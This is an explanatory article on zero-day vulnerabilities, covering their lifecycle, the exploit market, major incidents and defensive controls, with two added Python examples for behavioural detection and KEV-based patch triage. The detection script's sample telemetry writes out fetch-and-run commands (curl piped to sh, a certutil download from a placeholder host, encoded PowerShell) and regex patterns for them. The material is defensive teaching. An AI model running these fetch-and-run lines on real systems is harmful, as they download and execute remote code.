Every time a major cyberattack makes headlines, the word zero-day appears somewhere in the coverage. Zero-day exploits. Zero-day vulnerabilities. Zero-day attacks. The term carries weight — it implies sophistication, inevitability, and the unsettling idea that you can be compromised through a flaw that no defense in the world could have stopped.

That impression is partly accurate and partly misleading. Zero-days are real, they are dangerous, and they are used in some of the most significant attacks on record. But the mythology around them often obscures what they actually are, how they are discovered and deployed, and — most importantly — what you can actually do in the face of them.

The definition — what zero-day actually means

A zero-day vulnerability is a security flaw in software, hardware, or firmware that is unknown to the party responsible for fixing it. The term zero-day refers to the number of days the developer has had to address the issue: zero. They do not know it exists, which means they have had no time to develop a patch, issue an advisory, or warn users.

A zero-day exploit is the attack code or technique that takes advantage of a zero-day vulnerability. A zero-day attack is an actual intrusion carried out using a zero-day exploit.

The critical element that makes a zero-day so dangerous is timing. In normal vulnerability management, a flaw is discovered, reported to the vendor, a patch is developed and released, and users apply the patch. The window of exposure can be days, weeks, or months depending on how quickly each step happens, but it is a window with a visible beginning and an end. With a zero-day the beginning is invisible to the defender: you are exposed from the moment the flaw is introduced into the software until a patch is available and applied, and until the vendor learns of the flaw you have no way of knowing you are exposed.

A zero-day is not just an unpatched vulnerability. It is a vulnerability for which no patch exists because the developer does not know about it. The distinction matters enormously for how you think about defense.

How the zero-day lifecycle works

THE ZERO-DAY LIFECYCLE
1. Vulnerability introduced. A flaw is created, typically during software development. It may exist for months or years before anyone finds it. The developer is unaware.
2. Discovery. Someone finds the vulnerability: a security researcher, a government intelligence agency, a criminal group, or the software vendor itself. What happens next depends entirely on who finds it.
3. Decision point: disclose or exploit. Responsible researchers report the flaw to the vendor (coordinated or responsible disclosure). Intelligence agencies and criminal groups typically keep it secret and develop exploits. This is where the zero-day market operates.
4. Active exploitation: the true zero-day window. If the vulnerability is being exploited before the vendor knows about it, this is the true zero-day period. Every system running the vulnerable software is exposed, no patch exists, and the only defenses are compensating controls that do not depend on knowing the bug.
5. Vendor discovery and patch development. Eventually the vendor learns about the vulnerability, through its own research, a security report, or by detecting active exploitation. Patch development begins. This can take days to months.
6. Patch release and the n-day window. The patch is released and the vulnerability becomes public, usually with a CVE identifier and an advisory. Now it is an n-day: a known vulnerability with a known fix. Organizations that patch quickly close their exposure. Those that delay remain vulnerable, and exploitation frequently increases at this stage because the fix shows attackers exactly where to look.
7. Full remediation. The vulnerability is patched across exposed systems. Exploitation drops off as the attack surface shrinks. The zero-day is fully retired, though some organizations may remain vulnerable indefinitely.

Who finds zero-days and what they do with them

The zero-day ecosystem involves a range of actors with very different motivations and very different approaches to what they do with the vulnerabilities they find.

Independent security researchers. Many zero-days are found by security researchers working independently or for security firms. Most follow responsible disclosure practices — reporting directly to the vendor and giving them time to develop a patch before going public. Bug bounty programs from major vendors like Google, Microsoft, and Apple pay researchers for responsible disclosures, creating a financial incentive for the responsible path.

Government intelligence agencies. Nation-state intelligence agencies — the NSA, GCHQ, China's MSS, and equivalents globally — invest heavily in finding and stockpiling zero-days for offensive operations. These are used for espionage, disruption of adversary systems, and in some cases destructive attacks. The most sophisticated zero-days in existence are typically held by nation-states and never disclosed publicly.

The zero-day market. A commercial market exists for zero-day vulnerabilities. Brokers such as Zerodium and government contractors pay significant sums for reliable zero-days in widely used software. Published price lists range from tens of thousands to millions of dollars depending on the target, the level of access the exploit gains, and how reliably it works. Broker price lists have publicly offered $2 million or more for a full zero-click exploit chain against a fully patched iPhone. What the brokers' government customers pay, and what an exploit resells for, is not public.

Criminal organizations. Sophisticated ransomware groups and other criminal actors use zero-days, though less often than nation-states because of the cost. More commonly they buy exploits from brokers, reuse nation-state tooling that has leaked (EternalBlue is the best-known case), or simply wait for the n-day window. A few well-resourced groups have developed their own, as the MOVEit campaign showed.

Notable zero-day attacks

SIGNIFICANT ZERO-DAY INCIDENTS
Stuxnet (2010, nation-state). The most sophisticated zero-day attack ever publicly documented. Used four separate Windows zero-days at once to reach the industrial control systems driving Iranian uranium-enrichment centrifuges. Widely attributed to the US and Israel. Demonstrated that cyberweapons could cause physical destruction.
EternalBlue (2017, leaked NSA exploit). An exploit for a Windows SMBv1 vulnerability (CVE-2017-0144, fixed by Microsoft's MS17-010 update in March 2017), developed by the NSA and published by the Shadow Brokers group in April 2017. Used in the WannaCry ransomware outbreak that May, which hit an estimated 200,000 systems in 150 countries, including the UK's National Health Service. By then it was an n-day, not a zero-day: the patch had been available for two months and most victims had not applied it.
Log4Shell (2021, critical). CVE-2021-44228 in Log4j, a ubiquitous Java logging library embedded in millions of applications. CVSS score of 10.0, the maximum. Exploitable by getting a single crafted string (a JNDI lookup of the form ${jndi:...}) into any input the application logs. Affected systems from consumer products to enterprise infrastructure, and because the library is bundled inside so much other software, finding every vulnerable copy was harder than patching any one of them. Considered one of the most serious vulnerabilities ever discovered.
MOVEit (2023, criminal). The Cl0p ransomware group exploited a SQL injection zero-day (CVE-2023-34362) in Progress MOVEit Transfer, a managed file transfer product, stealing data from hundreds of organizations before a patch was available. Affected government agencies, universities, and corporations globally. Demonstrated that criminal actors can develop and weaponize zero-days themselves.

The zero-day market — what vulnerabilities are worth

ZERO-DAY MARKET PRICES (APPROXIMATE, FROM PUBLISHED BROKER LISTS)
$2M to $2.5M+
Full zero-click chain on iOS or Android: remote code execution with persistence
$500K
Chrome or Safari remote code execution with sandbox escape
$250K
Windows local privilege escalation
$100K
Microsoft Office remote code execution
$50K
Network device vulnerabilities (routers, firewalls, VPN appliances)

These are the prices brokers advertise to researchers; what their government customers pay is not public, but the scale explains why zero-days are primarily a nation-state weapon. Most criminal organizations will not spend $1 million on a single exploit when known vulnerabilities with available patches are routinely left unpatched by their targets. The criminal calculus favors the cheaper option, and the cheaper option works because patching remains a persistent organizational failure.

What you can actually do

Here is the honest answer: if a sophisticated nation-state with a genuine zero-day decides to target your specific organization, there is limited defense available. That is the nature of an unknown, unpatched vulnerability.

But two things make this less alarming than it sounds. First, the vast majority of organizations are never targeted by nation-state actors with zero-days. Second, the controls that limit zero-day impact are largely the same controls that prevent all other attacks — and they work.

HOW TO LIMIT ZERO-DAY EXPOSURE
1. Patch everything else immediately. Most "zero-day" attacks in practice are attacks on known vulnerabilities that have not been patched. Organizations that patch aggressively remove the low-hanging fruit and force attackers toward more expensive zero-days, which most attackers will not spend on you.
2. Reduce attack surface. The fewer systems and services exposed to the internet, the fewer places a zero-day can be used against you. Disable unnecessary services, put administrative interfaces behind a VPN or allow-list, and retire software you no longer need. A zero-day in a service you do not run costs you nothing.
3. Behavioral detection over signature detection. Signature-based antivirus cannot recognize an exploit nobody has seen before; at best it catches a known payload dropped afterwards. Behavioral detection watches what processes do (a document viewer launching a shell, a web server process spawning commands) regardless of whether the technique is known. EDR with behavioral analysis provides meaningful protection against zero-day exploitation.
4. Principle of least privilege. A zero-day that compromises a standard user account is significantly less damaging than one that lands as administrator or SYSTEM. Limiting what accounts can do limits what a zero-day can accomplish through those accounts.
5. Network segmentation. Even if a zero-day compromises one system, segmentation limits lateral movement. An attacker on a workstation in a well-segmented network cannot automatically reach the domain controller, the backup system, or the financial data.
6. Centralize telemetry and plan the response. A zero-day exploit that succeeds still leaves a trail: unusual process execution, unexpected outbound connections, anomalous authentication. Collect that telemetry centrally, with enough retention to look back once a zero-day is announced, and rehearse the response so the question "were we hit?" can be answered in hours rather than weeks. Advisories usually arrive with affected versions and indicators; the organizations that benefit are the ones that can search their own logs.
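The lineage-based rule that steps 3 and 6 describe, written out as an added example (it is not code from this article or from any vendor product). It runs over constructed process-creation events whose schema loosely mirrors Sysmon/EDR records; the schema, host and user names, and the 203.0.113.x addresses (a documentation range) are assumptions, and the rule lists are illustrative rather than a complete ruleset. It goes slightly beyond the text by also flagging encoded PowerShell and download cradles. Nothing in it references a CVE or an exploit signature: an Office process spawning cmd.exe, or a Java process spawning sh, looks the same whether the bug that got there is a known CVE or an unknown zero-day.

```python
"""Behavioural post-exploitation detection over constructed process telemetry.

Added example for this article (not code from the page or from any vendor).
The event schema below is an assumption that loosely mirrors Sysmon/EDR
process-creation records; the rule lists are illustrative, not complete.
"""
import re

# Constructed sample telemetry (not real captures). Fields: id, host, user,
# parent (image path of the parent process), image, cmdline.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws-017", "user": "CORP\\jdoe",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n Q3-report.docx"},
    {"id": 2, "host": "ws-017", "user": "CORP\\jdoe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"id": 3, "host": "web-02", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"id": 4, "host": "ws-017", "user": "NT AUTHORITY\\SYSTEM",
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"id": 5, "host": "ws-031", "user": "CORP\\build",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File build.ps1"},
    {"id": 6, "host": "app-07", "user": "tomcat",
     "parent": "/usr/lib/jvm/java-11/bin/java",
     "image": "/bin/sh",
     "cmdline": "sh -c curl -s http://203.0.113.7/x | sh"},
    {"id": 7, "host": "ws-017", "user": "CORP\\jdoe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.7/a.exe a.exe"},
]

# Parents that have no legitimate reason to launch a shell or scripting host.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "acrord32.exe", "w3wp.exe", "httpd", "nginx", "java", "php-fpm"}
SHELLS_AND_SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                           "cscript.exe", "mshta.exe", "sh", "bash", "dash"}

# PowerShell -e/-ec/-enc/-EncodedCommand followed by a base64 blob.
ENCODED_POWERSHELL = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s")
# Common "fetch and run" shapes on both platforms.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(?:"
    r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b"                            # curl ... | sh
    r"|certutil.*-urlcache"                                             # certutil as downloader
    r"|(?:DownloadString|DownloadFile|Invoke-WebRequest).*(?:IEX|Invoke-Expression)"
    r"|\bIEX\b.*(?:DownloadString|Net\.WebClient)"                      # IEX (New-Object Net.WebClient)...
    r")"
)


def basename(path):
    """Last path component, lower-cased, for both Windows and POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def evaluate(event):
    """Return the list of rule names this single event trips (empty if none)."""
    reasons = []
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent in SUSPICIOUS_PARENTS and child in SHELLS_AND_SCRIPT_HOSTS:
        reasons.append("document_or_server_process_spawned_shell")
    if ENCODED_POWERSHELL.search(event["cmdline"]):
        reasons.append("encoded_powershell")
    if DOWNLOAD_CRADLE.search(event["cmdline"]):
        reasons.append("download_cradle")
    return reasons


def analyze_events(events):
    """Run every rule over every event; return one finding per flagged event."""
    findings = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            findings.append({"id": ev["id"], "host": ev["host"], "user": ev["user"],
                             "parent": basename(ev["parent"]),
                             "image": basename(ev["image"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f['host']}] event {f['id']}: {f['parent']} -> {f['image']} "
              f"({', '.join(f['reasons'])}) as {f['user']}")
```

Events 1, 4 and 5 are ordinary activity and pass; the build user running PowerShell interactively is not flagged, which is the point of keying on parent lineage rather than on the shell itself. Events 2, 3, 6 and 7 are the post-exploitation shapes a zero-day leaves behind: an Office document that spawns an encoded PowerShell, a web worker running reconnaissance, a Java service piping curl into sh (what Log4Shell exploitation looked like on the host), and certutil used as a downloader.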

"Defending against zero-days is not about stopping the initial exploit — it is about limiting what an attacker can do after they get in. Assume breach. Build your defenses around that assumption."

Zero-days and the intel feed

When you see a zero-day reported on intel.mycyberbrief.com, the coverage will typically include the CVE identifier if one has been assigned, the affected software and versions, whether active exploitation has been confirmed, and whether a patch is available.

The most important signal in any zero-day report is whether exploitation is confirmed in the wild. A zero-day that is theoretical or limited to targeted attacks against specific high-value targets requires a different response than a zero-day being mass-exploited by criminal groups. The threat level, the urgency of response, and the actions you need to take differ significantly based on this distinction.

CISA's Known Exploited Vulnerabilities (KEV) catalog is the authoritative public list of vulnerabilities with confirmed active exploitation. When a vulnerability is added, Binding Operational Directive 22-01 gives US federal civilian agencies a remediation deadline, and the entry records whether the bug is known to be used in ransomware campaigns. For everyone else it is a strong signal about which vulnerabilities require urgent attention, independent of their CVSS score.
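The triage logic the two paragraphs above describe, as an added example (not a CISA tool and not code from this page). It joins constructed scanner findings against KEV-style catalog entries and ranks them the way the text suggests: confirmed exploitation first, CVSS second, with a missing patch changing the action rather than lowering the urgency. It uses the real KEV field names and the real Log4Shell and MOVEit CVE identifiers, but the dates and other field values are approximate and constructed, the hosts and findings are constructed, the `EXAMPLE-000x` identifiers are placeholders rather than CVEs, and the `exploited_in_wild` flag stands in for an intel-feed report on a bug not yet in the catalog.

```python
"""Ranking scanner findings by confirmed exploitation rather than CVSS score.

Added example for this article; not a CISA tool and not code from the page.
Catalog entries use the field names of CISA's published KEV JSON feed. The two
CVE IDs are the real Log4Shell and MOVEit Transfer identifiers, but dates and
other values are approximate and constructed for the example, not copied from
the live catalog. Scanner findings, hosts, the EXAMPLE-000x placeholder IDs
(not real CVEs) and the exploited_in_wild flag are all constructed.
"""
from datetime import date

KEV_CATALOG = [
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
     "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
     "dateAdded": "2021-12-10", "dueDate": "2021-12-24",
     "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2023-34362", "vendorProject": "Progress", "product": "MOVEit Transfer",
     "vulnerabilityName": "Progress MOVEit Transfer SQL Injection Vulnerability",
     "dateAdded": "2023-06-02", "dueDate": "2023-06-23",
     "knownRansomwareCampaignUse": "Known"},
]

# Constructed vulnerability-scanner output for five hosts.
SCAN_FINDINGS = [
    {"host": "app-07", "cve": "CVE-2021-44228", "cvss": 10.0, "patch_available": True},
    {"host": "web-02", "cve": "EXAMPLE-0001", "cvss": 9.9, "patch_available": True},
    {"host": "mft-01", "cve": "CVE-2023-34362", "cvss": 9.8, "patch_available": True},
    # exploited_in_wild: an intel-feed report on a bug the vendor has not fixed
    # and that is not in the catalog yet, i.e. still a zero-day for the defender.
    {"host": "vpn-01", "cve": "EXAMPLE-0002", "cvss": 8.1, "patch_available": False,
     "exploited_in_wild": True},
    {"host": "ws-017", "cve": "EXAMPLE-0003", "cvss": 7.5, "patch_available": True},
]


def classify(finding, entry, today):
    """Return (priority, action) for one finding.

    entry is the KEV record for the CVE, or None. Confirmed exploitation
    (a KEV listing or an intel report) outranks CVSS; the absence of a patch
    changes the action from 'patch' to 'mitigate' but does not lower urgency.
    """
    exploited = entry is not None or finding.get("exploited_in_wild", False)
    if not finding["patch_available"]:
        return ("P1" if exploited else "P3",
                "mitigate: no patch available, apply vendor workaround or isolate the host")
    if entry is not None:
        due = date.fromisoformat(entry["dueDate"])
        overdue = today > due
        ransomware = entry["knownRansomwareCampaignUse"] == "Known"
        prio = "P1" if (ransomware or overdue) else "P2"
        return (prio, f"patch now: KEV due {entry['dueDate']}" + (", overdue" if overdue else ""))
    if exploited:
        return ("P1", "patch now: exploitation reported, not yet in KEV")
    if finding["cvss"] >= 9.0:
        return ("P3", "patch this cycle: critical CVSS but no exploitation evidence")
    return ("P4", "patch in the normal cycle")


def triage(findings, catalog, today_iso):
    """Join findings to the catalog; return them ordered by priority, then CVSS."""
    today = date.fromisoformat(today_iso)
    kev = {e["cveID"]: e for e in catalog}
    rows = []
    for f in findings:
        prio, action = classify(f, kev.get(f["cve"]), today)
        rows.append({**f, "priority": prio, "action": action})
    rows.sort(key=lambda r: (r["priority"], -r["cvss"]))
    return rows


def cvss_order(findings):
    """The order a CVSS-only ranking would produce, for comparison."""
    return [f["host"] for f in sorted(findings, key=lambda f: -f["cvss"])]


if __name__ == "__main__":
    print("CVSS-only order:", cvss_order(SCAN_FINDINGS))
    for r in triage(SCAN_FINDINGS, KEV_CATALOG, "2023-06-10"):
        print(f"{r['priority']} {r['host']:7} {r['cve']:15} CVSS {r['cvss']:4}  {r['action']}")
```

Run with a reference date of 2023-06-10, the CVSS-only ordering puts the unexploited 9.9 on web-02 ahead of the MOVEit host, while the KEV-driven ordering puts both catalog entries and the unpatched, actively exploited VPN appliance ahead of it. The VPN row is the zero-day case from the article: nothing to patch yet, so the action is a vendor workaround or isolation, but the priority stays P1 because exploitation is confirmed.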
